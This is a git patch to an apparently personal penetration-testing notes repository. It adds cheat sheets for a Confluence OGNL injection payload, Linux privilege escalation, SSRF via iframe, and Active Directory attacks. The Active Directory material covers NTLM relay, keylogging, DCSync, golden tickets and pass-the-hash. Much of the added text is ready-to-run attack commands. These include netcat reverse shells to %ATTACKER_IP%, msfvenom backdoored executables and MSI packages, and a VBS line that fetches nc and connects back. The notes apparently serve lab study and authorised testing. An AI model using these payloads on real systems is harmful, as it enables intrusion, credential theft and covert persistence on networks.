From bf6d08e15defb62c4744d7e1b8d90fe419a1f0fd Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Wed, 6 Jul 2022 22:49:06 +0200
Subject: [PATCH] AD stuff

---
 exploit/java/OGNL/cve_2022_26134.md           |  23 +
 exploit/linux/groups.md                       |   3 +
 exploit/linux/setcap.md                       |  13 +
 exploit/linux/sudo/tokens.md                  |  14 +
 exploit/web/ssrf/iframe.md                    |  22 +
 misc/active_directory/AD_CS.md                |  12 +-
 misc/active_directory/ad_misconfiguration.md  | 183 +++++
 misc/active_directory/ad_persistence.md       |  52 ++
 misc/active_directory/lateral_movement.md     | 264 +++++++
 pivoting.md                                   |  58 +-
 .../priv_esc/docs/windows/windows_priv_esc.md |  12 +-
 .../smokey@10.10.157.16                       | 694 ------------------
 12 files changed, 643 insertions(+), 707 deletions(-)
 create mode 100644 exploit/java/OGNL/cve_2022_26134.md
 create mode 100644 exploit/linux/groups.md
 create mode 100644 exploit/linux/setcap.md
 create mode 100644 exploit/linux/sudo/tokens.md
 create mode 100644 exploit/web/ssrf/iframe.md
 create mode 100644 misc/active_directory/ad_misconfiguration.md
 create mode 100644 misc/active_directory/ad_persistence.md
 create mode 100644 misc/active_directory/lateral_movement.md
 delete mode 100755 post_exploitation/priv_esc/kernel-exploits/linux-exploit-suggester-2/smokey@10.10.157.16

diff --git a/exploit/java/OGNL/cve_2022_26134.md b/exploit/java/OGNL/cve_2022_26134.md
new file mode 100644
index 0000000..cf2e7f6
--- /dev/null
+++ b/exploit/java/OGNL/cve_2022_26134.md
@@ -0,0 +1,23 @@
+# CVE-2022-26134
+
+* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
+* Confluence versions:
+    * 1.3.0 to 7.4.17
+    * 7.13.0 to 7.13.7
+    * 7.14.0 to 7.14.3 
+    * 7.15.0 to 7.15.2 
+    * 7.16.0 to 7.16.4
+    * 7.17.0 to 7.17.4
+    * 7.18.0 to 7.18.1 
+* Object Graph Navigation Language (OGNL)
+
+## Usage
+
+* Payload is a GET request which is set via the URI
+```sh
+ ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
+```
+* URL encode and curl for PoC
+
+* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)
+
diff --git a/exploit/linux/groups.md b/exploit/linux/groups.md
new file mode 100644
index 0000000..2de2950
--- /dev/null
+++ b/exploit/linux/groups.md
@@ -0,0 +1,3 @@
+# Groups
+
+* [steflan-security](https://steflan-security.com/linux-privilege-escalation-exploiting-user-groups/)
diff --git a/exploit/linux/setcap.md b/exploit/linux/setcap.md
new file mode 100644
index 0000000..625270c
--- /dev/null
+++ b/exploit/linux/setcap.md
@@ -0,0 +1,13 @@
+# setcap
+
+* Set capabilities of a binary
+* [Hacktrick's setuid page](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/euid-ruid-suid)
+
+
+## Usage
+
+* If there is an S-bit or sudo on setcap do the following. Copy python binary and
+```sh
+setcap cap_setuid+ep /absolute/path/to/copied/python3 
+python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
+```
diff --git a/exploit/linux/sudo/tokens.md b/exploit/linux/sudo/tokens.md
new file mode 100644
index 0000000..8dce3d0
--- /dev/null
+++ b/exploit/linux/sudo/tokens.md
@@ -0,0 +1,14 @@
+# Reusing Sudo Token
+
+* Reuse sudo token of currently logged in user
+* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
+
+* `ptrace` has to be fully enabled
+```sh
+cat /proc/sys/kernel/yama/ptrace_scope
+0
+```
+* sudo has to be triggered the last 15 minutes, check `ps wuax`
+* `gdb` has to be installed
+* One must be logged in as the same user which should be owned
+* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)
diff --git a/exploit/web/ssrf/iframe.md b/exploit/web/ssrf/iframe.md
new file mode 100644
index 0000000..109f34a
--- /dev/null
+++ b/exploit/web/ssrf/iframe.md
@@ -0,0 +1,22 @@
+# SSRF through iframe
+
+* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
+* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
+```php
+<?php
+$loc = "http://127.0.0.1/";
+
+if(isset($_GET['a'])){
+    $loc = $_GET['a'];
+}
+header('Location: '.$loc);
+?>
+```
+* Payload looks like this
+```html
+<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
+```
+* Start a php adhoc server and run it
+```php
+php -S 0.0.0.0:4711
+```
diff --git a/misc/active_directory/AD_CS.md b/misc/active_directory/AD_CS.md
index 31ab7d4..9e39e8c 100644
--- a/misc/active_directory/AD_CS.md
+++ b/misc/active_directory/AD_CS.md
@@ -10,7 +10,7 @@
 
 ## Certificate Templates
 
-* Extended/Enhanced Key Usage 
+* Extended/Enhanced Key Usage (EKU)
 * Parameter combination can be exploited
 * User Certificates may be requested from a member of a Domain User Group
 * Machine Certifcates may be requested from a host of a Domain Computer Group 
@@ -43,7 +43,7 @@ Exploitable templates should have the following traits:
 
 * On the machine via
 ```sh
-Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
+Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
 ```
 * Select a domain admin via opening `Active Directory Users and Computers`
 ```sh
@@ -51,6 +51,14 @@ Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path
 ```
 * `runas /user:<domain>\<username of DA> cmd.exe`
 
+* Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
+```sh
+privilege::debug
+kerberos::ptt <name of file to write TGT to.kirbi>
+exit
+dir \\<domain>\<dir>$\
+```
+
 ## CVE-2022-26923
 
 * Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
diff --git a/misc/active_directory/ad_misconfiguration.md b/misc/active_directory/ad_misconfiguration.md
new file mode 100644
index 0000000..5f91fe5
--- /dev/null
+++ b/misc/active_directory/ad_misconfiguration.md
@@ -0,0 +1,183 @@
+# Active Directory Misconfigurations
+
+## Permission Delegation
+
+* Permissions to functions may be delegated as a standard functions itself
+* Privilege creep becomes a problem eventually
+* Discretionary ACLs are controlled by Access Control Entries (ACEs)
+
+### The following ACEs are critical and prone to be exploited
+
+* __GenericAll__, complete control and creation of an object
+* __ForceChangePassword__, change the password of a user and sometimes administrator passwords
+* __AddMembers__, add a user to an existing group
+* __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts.
+* __WriteOwner__, change owner of a target object. 
+* __WriteDACL__, create new ACEs to an object's DACL
+* __AllExtendendRights__ all control over an object's permission
+
+### Tools to exploit ACEs
+
+* AD-RSAT
+* Powersploit
+
+* BloodHound, check permissions to target
+
+### Usage
+
+* Add user to a group via powershell
+```sh
+Add-GroupMember "<GroupName>" -Members "<username>"
+```
+
+* List info about groups, preferably administration groups
+```sh
+Get-ADGroupMember -Identity "<GroupName>"
+```
+
+* Set new password for user, afterwards reconnect session
+```sh
+$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force 
+Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
+```
+
+## Kerberos Delegation
+
+* Unconstrained (without limit) delegation, [exploit](https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976)
+* Constrained delegation
+* Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
+
+### Delegatable Services
+
+* __HTTP__
+* __CIFS__
+* __LDAP__
+* __HOST__
+* __MSSQL__
+
+### Usage
+
+* Enumerate via powerview
+```sh
+Import-Module .\PowerView.ps1
+Get-NetUser -TrustedToAuth
+```
+
+## Automated Relays
+
+### Machine Accounts
+
+* Administrative machine account of one host having administrative permissions over another host
+
+### Printers
+
+* Target has to have an SMB server
+* Spooler, PetitPotam, PrintNightmare are printer exploits
+* Query printer services through a servers domain
+```sh
+GWMI Win32_Printer -Computer <domain>
+Get-PrinterPort -ComputerName <domain>
+```
+* SMB signing may be enabled but must not be enforced in order for the exploit to work, check via
+```sh
+nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
+```
+* Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth
+```sh
+ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
+```
+* Authenticate on attacker with the credentials already gained from a windows computer 
+```sh
+SpoolSample.exe <domain> "$ATTACKER_IP"
+```
+* Authenticate with the received credential
+```sh
+ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
+```
+
+## Active Directory Users
+
+### Credentials
+
+### Keylogging
+
+* With a meterpreter shell migrate to an active user's process and set a keylogger
+```sh
+migrate <processID>
+keyscan_start
+```
+* To inspect the results
+```sh
+keyscan_dump
+```
+
+## Group Policy Objects
+
+* Every `GPO` has a `GUID`
+* Local Policies are configured for application rules for FW, Windows-Defender, Applocker
+    * Other local policies are group memberships, startup config, protocols
+    * Group policies change configuration of these remotely over AD
+* `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain
+
+### Usage
+
+* Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
+* Start a `cmd` with a AD user and execute `mmc` through it
+```sh
+runas /netonly /user:<domain>\<username> cmd.exe
+mmc
+```
+* Check connection of the `cmd.exe` via 
+```sh
+dir \\<domain>\sysvol
+```
+* Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK`
+* On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `<domain>` -> `Server` -> `Management Servers` and right click to edit the group
+* On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups
+
+## Certificates
+
+* [AD Certificate Services](./AD_CS.md)
+
+## Domain Trusts
+
+* Domain Trusts offer access to resources to users in the domain
+    * Directional, from trusted domain to another truster domain
+    * Transitive, beyond more than just one other domain
+
+
+* Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
+* `krbtgt` as an account signs and encrypts TGTs
+* Crafting a golden ticket by becoming a TGS. Following info is needed
+    * FQDN
+    * Security identifier of the domain (SI)
+    * Target's username
+    * __KRBTGT password hash__ store on the DC
+
+### Usage
+
+* `KRBTGT` via Mimikatz, resulting in `Hash NTLM`
+```sh
+privilege::debug
+lsadump::dsync /user:<username\kbtgt>
+```
+* Craft the ticket with the help of this hash
+
+* Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21-<RootDomain>-519`
+* SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
+* Get child SIDs via
+```sh
+Get-ADComputer -Identity "<DCChildCN>"
+```
+* Get parent SID via
+```sh
+Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
+```
+* Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz
+```sh
+privilege::debug
+kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
+exit
+dir \\DCdomain\dir$
+dir \\Parentdomain\dir$ 
+```
diff --git a/misc/active_directory/ad_persistence.md b/misc/active_directory/ad_persistence.md
new file mode 100644
index 0000000..9357532
--- /dev/null
+++ b/misc/active_directory/ad_persistence.md
@@ -0,0 +1,52 @@
+# Active Directory Persistance
+
+
+## Using Credentials
+
+* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest 
+* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
+    * Credentials for multiple local administrators
+    * Service account with delegation permissions
+    * __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)
+
+### Usage
+
+* Use mimikatz
+```sh
+lsadump::dcsync /domain:<domain> /user:<username>
+```
+* To query the krbtgt user
+```sh
+lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
+```
+* Query everything
+```sh
+lsadump::dcsync /domain:<domain> /all
+```
+
+## Using Tickets
+
+* __Golden Ticket__ crafted TGT, 
+    * Needs domain name, domain SID and a user ID to impersonate
+    * Needs krbtgt NTLM to sign the ticket
+    * krbtgt hash never rotates automatically, only refreshed manually
+    * krbtgt hash bypasses smart cards
+    * TGT can not be older than 20 minutes
+    * TGT lifetime can be set to years
+    * TGT can be signed anywhere as long as the krbtgt hash is known
+
+* __Silver Ticket__ crafted TGS
+    * Signed by targeted service account on a host
+    * DC is never contacted, no contact to any TGT or KDC
+    * Non existing user can be used with a local admin group's SID
+
+### Usage 
+
+* Craft a golden ticket
+```sh
+Get-ADDomain
+```
+```sh
+kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
+```
+
diff --git a/misc/active_directory/lateral_movement.md b/misc/active_directory/lateral_movement.md
new file mode 100644
index 0000000..cf4f2b5
--- /dev/null
+++ b/misc/active_directory/lateral_movement.md
@@ -0,0 +1,264 @@
+# Lateral Movement
+
+* Finding credentials with more permissions move through the network cloaked, avoiding detection
+* Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
+* Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts
+
+* __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service`
+
+## Remote Processes
+
+### psexec
+
+* Port `445`
+* `SMB` protocol
+* Group membership: `Administrators`
+
+* Upload the service binary to `ADMIN$` directory of the SMB server
+* Use `psexesvc.exe` via service control manager to execute the remote process
+* Communication will be established through a named pipe
+
+```sh
+psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
+```
+
+### WinRM
+
+* Ports `5985` (HTTP) and `5986` (HTTPS)
+* Group Membership: `Remote Management Users`
+
+* Execute powershell commands on remote targets
+
+```sh
+winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
+```
+
+* Run through powershell alternatively via
+```sh
+$username = "Administrator";
+$password = "SecurePassword";
+$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
+$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
+
+Enter-PSSession -Computername TARGET -Credential $credential
+Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}
+```
+
+### sc
+
+* Ports `135`, `49152-65535` (DCE/RPC), `135` shows service endpoints on the high ports
+* Ports `139` and `445`RPC over SMB named pipes, if SVCCTL fails over `135`
+* Group Membership: `Administrators`
+
+* Create service remotely via Service Control Manager (RPC) or `SVCCTL`
+
+```sh
+sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
+sc.exe \\%TARGET_IP% start MyService
+
+sc.exe \\%TARGET_IP% stop MyService
+sc.exe \\%TARGET_IP% delete MyService
+```
+
+### schtasks
+
+* Create remote scheduled tasks
+```sh
+schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
+schtasks /s TARGET /run /TN "SteamUpdateService" 
+```
+* Delete scheduled tasks via
+```sh
+schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
+```
+
+### wmi
+
+* Ports are
+    * DCOM `135` RPC and dynamic ports
+    * Wsman `5985` winrm HTTP and `5986` winrm HTTPS
+* Group membership: `Administrators`
+
+* To start, use the same object used for winrm
+```sh
+$username = "Administrator";
+$password = "SecurePassword";
+$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
+$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
+```
+
+* Store the session
+```sh
+$Opt = New-CimSessionOption -Protocol DCOM
+$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
+```
+
+* __Spawn a remote process__
+```sh
+$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";
+
+Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
+CommandLine = $Command
+}
+```
+
+* Alternatively via
+```sh
+wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%" 
+```
+
+* __Spawn a remote service__
+```sh
+Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
+Name = "SteamUpdateService";
+DisplayName = "SteamUpdateService";
+PathName = "net user gabenewell securepassword /add"; 
+ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
+StartMode = "Manual"
+}
+```
+* Initiate the service
+```sh
+$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"
+
+Invoke-CimMethod -InputObject $Service -MethodName StartService
+```
+* Start and stop via
+```sh
+Invoke-CimMethod -InputObject $Service -MethodName StopService
+Invoke-CimMethod -InputObject $Service -MethodName Delete
+```
+
+* __Spawn a remote scheduled task__
+```sh
+$Command = "cmd.exe"
+$Args = "/c net user gabenewell securepassword /add"
+
+$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
+Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
+Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
+```
+* Delete task via
+```sh
+Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
+```
+
+* __ Install a remote msi package__
+```sh
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
+```
+* Upload and run via
+```sh
+Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
+```
+* Alternatively on older systems via
+```sh
+wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
+```
+
+## Further Authentication Methods
+
+* NTLM
+* Kerberos
+
+### NTLM
+
+#### __Pass the hash__
+
+* Retrieve and pass a hash generated from the password
+
+* Use mimikatz on local SAM
+```sh
+privilege::debug
+token::elevate
+lsadump::sam
+```
+    * Use mimikatz on lsass
+```sh
+privilege::debug
+token::elevate
+sekurlsa::msv
+```
+
+    * Open reverse shell via mimikatz
+```sh
+token::revert
+sekurlsa::pth /user:<username>
+/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP%  4711"
+```
+
+* Via RDP
+```sh
+xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
+``` 
+* Via psexec
+```sh
+psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
+```
+* Kerberos
+```sh
+evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>
+```
+
+### Kerberos
+
+* Ticket and session key are needed
+
+#### Pass The Ticket
+
+* Extract via mimikatz
+```sh
+privilege::debug
+sekurlsa::tickets /export
+```
+* TGS need low privilege account, TGT need administrative privileges
+* Use the ticket to inject into a current session
+```sh
+kerberos::ptt <ticket>@<domain>.kirbi
+```
+
+* Check tickets via `klist`
+
+
+#### Overpass The Hash
+
+* Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
+    * Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled
+    * `rc4` is a pure ntml hash
+* Use the key to gain the TGT 
+```sh
+privilege::debug
+sekurlsa::ekeys
+```
+
+* Open a reverse shell via
+```sh
+sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
+```
+
+## Writeable Shares
+
+* Find a shortcut, a script or anything that keeps a connection over the network to a share
+
+* Reuse a `*.vbs` via
+```sh
+CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
+```
+
+* Reuse and inject into exisiting portable executable
+```sh
+msfvenom -a x64 --platform windows  -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
+```
+
+* Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name
+```sh
+PsExec64.exe -s cmd.exe
+query user
+```
+* Check output and fill in
+```sh
+tscon <ID-of-target> /dest:<my-SESSIONNAME>
+```
+* Session state should be `DISC`, a session which was not exited correctly
+* Windows Server < 2019 only without the password
+
diff --git a/pivoting.md b/pivoting.md
index 66c590d..ec5a68f 100644
--- a/pivoting.md
+++ b/pivoting.md
@@ -10,7 +10,8 @@
 * `/etc/resolv.conf`
 * `ipconfig /all`
 * `nmcli dev show`
-### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
+* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
+
 ### Scripting Techniques
 ```sh
 for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
@@ -19,17 +20,25 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
 * Using local tools through a proxy like `nmap`
 
 ## Tools
-### Enumerating a network using native and statically compiled tools
+
+* Enumerating a network using native and statically compiled tools
+
 ### Proxychains / FoxyProxy
-* Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server
+
+* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
+    ```sh
+    ssh <username>@$ATTACKER_IP -R 9050 -N
+    ```
+* Proxychains, e.g. scan target via nmap, or connect via nc through jump server
     ```sh
     proxychains nc <IP> <PORT>
     proychains nmap <IP>
     proxychains ssh user@$TARGET_IP
     proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
+    proxychains wget http://$TARGET_IP:8000/loot.zip
     ```
     * Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
-    ```
+    ```sh
     [ProxyList]
     # add proxy here ...
     # meanwhile
@@ -41,18 +50,29 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo
 * FoxyProxy, choose proxy type, proxy IP and port in settings 
 
 ### SSH port forwarding and tunnelling (primarily Unix)
+
 * LocalPortForwarding
     ```sh
-    ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
+    ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
     ```
+    * Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`. One can connect now to the target via the jumpserver
+    * Tip: open port on windows target via
+    ```sh
+    netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
+    ```
+
 * Dynamic Port Forwarding
     ```sh
-    ssh -D <Port> <user>@<Jumpserver> -fN
+    ssh -D $PORT <user>@<Jumpserver> -fN
     ```
-* Reverse Proxy
+
+* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
     ```sh
-    ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
+    ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
     ```
+    * Tip1: create a user on the attacker to receive the connection without compromising your own password
+    * Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target
+
 ### plink.exe (Windows)
 * [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
 ```sh
@@ -68,6 +88,7 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
 ```
 
 ### Socat
+
 * Reverse shell on target via
     ```sh
     ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
@@ -76,10 +97,12 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
     ```sh
     sudo nc -lvnp 443
     ```
-* Relay via Jumpserver
+
+* Relay on jumpserver via
     ```sh
     ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
     ```
+
 * Quiet Port Forwarding
     * On attacker
     ```sh
@@ -90,8 +113,14 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
     ./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
     ```
     * Open `localhost:8000`
+
 * Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
 
+* In need of a Download on target, expose a port on the attacker via relay
+    ```sh
+    socat tcp-l:80,fork tcp:$ATTACKER_IP:80
+    ```
+
 ### Chisel
 * **Does not require SSH on target**
 * Reverse Proxy
@@ -151,7 +180,7 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
 * Exclude servers via `-x`, for example the target/gateway server
 
 ### Meterpreter
-* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
+* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do
 ```sh
 portfwd add -l 22 -p 22 -r 127.0.0.1
 ```
@@ -173,4 +202,13 @@ run
 ```sh
 use auxiliary/server/socks_proxy
 ```
+* Set proxychain on attacker accordingly
 
+### rpivot
+
+* [klsecservices' repo](https://github.com/klsecservices/rpivot.git)
+* [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0)
+
+## Links
+
+* [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)
diff --git a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
index 982064c..eb6e8e4 100644
--- a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
+++ b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
@@ -7,6 +7,7 @@
 * [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
 * [privescheck](https://github.com/itm4n/PrivescCheck)
 * [windows exploit suggester](https://github.com/bitsadmin/wesng)
+* [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)
 
 ## Account Types
 
@@ -38,7 +39,7 @@ qwinsta
 hostname
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
 ```
-* Installed software
+* Installed software, check for existing exploits
 ```sh
 wmic product get name,version,vendor
 ```
@@ -263,7 +264,16 @@ copy cmd.exe utilman.exe
 ```
 * Log out, on the Login screen click on `Ease of Access`
 
+
 #### SeImpersonate / SeAssignPrimaryToken
 
+* It is a rouge potato
 * Execute process as another user
+* Service accounts operate through impersonation
+* Check privileges via `whoami /priv` for these 
+* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
+```sh
+socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
+```
+* Catch the potatoe executable from target via netcat
 
diff --git a/post_exploitation/priv_esc/kernel-exploits/linux-exploit-suggester-2/smokey@10.10.157.16 b/post_exploitation/priv_esc/kernel-exploits/linux-exploit-suggester-2/smokey@10.10.157.16
deleted file mode 100755
index 82a7704..0000000
--- a/post_exploitation/priv_esc/kernel-exploits/linux-exploit-suggester-2/smokey@10.10.157.16
+++ /dev/null
@@ -1,694 +0,0 @@
-#!/usr/bin/perl
-use strict;
-use warnings;
-use Getopt::Std;
-
-our $VERSION = '2';
-
-my %opts;
-getopts( 'k:hd', \%opts );
-if (exists $opts{h}) {
-    usage();
-    exit;
-};
-
-print_banner();
-my ( $khost, $is_partial ) = get_kernel();
-print "  Local Kernel: \e[00;33m$khost\e[00m\n";
-
-my %exploits = get_exploits();
-print '  Searching ' . scalar keys(%exploits) . " exploits...\n\n";
-print "  \e[1;35mPossible Exploits\e[00m\n";
-
-my $count = 1;
-my @applicable = ();
-EXPLOIT:
-foreach my $key ( sort keys %exploits ) {
-    foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {
-
-        if (     $khost eq $kernel
-              or ( $is_partial and index($kernel,$khost) == 0 )
-        ) {
-            $exploits{$key}{key} = $key;
-            push(@applicable, $exploits{$key});
-            print "  \e[00;33m[\e[00m\e[00;31m$count\e[00m\e[00;33m]\e[00m ";
-            print "\e[00;33m$key\e[00m";
-            print " \e[00;33m($kernel)\e[00m" if $is_partial;
-
-            my $alt = $exploits{$key}{alt};
-            my $cve = $exploits{$key}{cve};
-            my $mlw = $exploits{$key}{mil};
-            if ( $alt or $cve ) {
-                print "\n";
-            }
-            if ( $alt ) { print "      Alt: $alt "; }
-            if ( $cve ) { print "      CVE-$cve"; }
-            if ( $mlw ) { print "\n      Source: $mlw"; }
-            print "\n";
-            $count += 1;
-            next EXPLOIT;
-        }
-    }
-}
-print "\n";
-
-if (!@applicable) {
-    print "  No exploits are available for this kernel version\n\n";
-    exit;
-}
-
-if (exists $opts{d}) {
-    print "  \e[1;36mExploit Download\e[00m\n";
-    print "  (Download all: \e[00;33m'a'\e[00m / Individually: \e[00;33m'2,4,5'\e[00m ";
